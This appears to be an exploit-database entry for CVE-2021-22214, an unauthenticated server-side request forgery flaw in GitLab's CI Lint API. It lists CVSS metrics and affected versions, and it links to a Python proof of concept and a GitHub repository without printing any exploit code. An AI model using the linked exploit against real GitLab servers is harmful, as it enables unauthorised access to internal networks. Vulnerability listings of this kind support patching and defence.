Share
## https://sploitus.com/exploit?id=5BE6489F-BE55-5998-8116-E8A72B600191
* CVE-2021-22214
--------
** Description
- POC for CVE-2021-22214: Gitlab CI Lint API未授权 SSRF漏洞
- create by antx at 2021-11-01.
--------
** Detail
- When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
--------
** CVE Severity
- attackComplexity: HIGH
- attackVector: NETWORK
- availabilityImpact: NONE
- confidentialityImpact: HIGH
- integrityImpact: NONE
- privilegesRequired: NONE
- scope: CHANGED
- userInteraction: NONE
- version: 3.1
- baseScore: 6.7
- baseSeverity: MEDIUM
--------
** Affect
- Gitlab >=10.5, <13.10.5
- Gitlab >=13.11, <13.11.5
- Gitlab >=13.12, <13.12.2
--------
** POC
- [[./CVE-2021-22214.py][Python-Poc]]
--------
** Reference
- POC
- [[https://github.com/r0ckysec/CVE-2021-22214][r0ckysec/CVE-2021-22214]]
- CVE
- [[https://github.com/CVEProject/cvelist/blob/master/2021/22xxx/CVE-2021-22214.json][CVE-2021-22214]]